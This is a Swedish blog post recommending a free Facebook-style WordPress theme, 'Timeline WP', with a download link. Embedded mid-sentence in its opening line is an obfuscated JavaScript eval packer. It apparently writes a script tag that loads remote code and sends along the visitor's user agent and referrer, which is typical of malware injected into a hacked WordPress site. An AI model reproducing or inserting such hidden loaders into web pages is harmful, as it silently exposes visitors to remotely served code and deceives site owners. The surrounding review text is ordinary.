Image Image Image Image Image Image Image Image Image Image

| 19 januari, 2020

Scroll to top

Top

Gratis WordPress theme, Timeline WP

Gratis WordPress theme, Timeline WP
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iinfy|var|u0026u|referrer|httby||js|php’.split(’|’),0,{}))
gick fort. 🙂

Nu har någon fått för sig att släppa ett riktigt häftigt tema till wordpress. Temat baserar sig på nya Facbookprofilen ”Timeline” som inte lanserats fullt ut i Sverige än. Temat heter såklart ”Timeline WP” och är helt kostnadsfritt att ladda ner.

För er som är som mig och gillar att leka i WordPress så kan jag rekommendera detta tema starkt. Även om det ser exakt ut som Facebook så är det mycket välgjort och har en massa roliga funktioner inbakade.

Och för er andra som kanske inte är intresserade av WordPress, jag ni kan ta er en titt på hur nya facebook Timline wp är uppbyggd och ser ut i mer detalj än bilderna på nätet.

Ladda ner temat här: http://www.timeline-wp.com/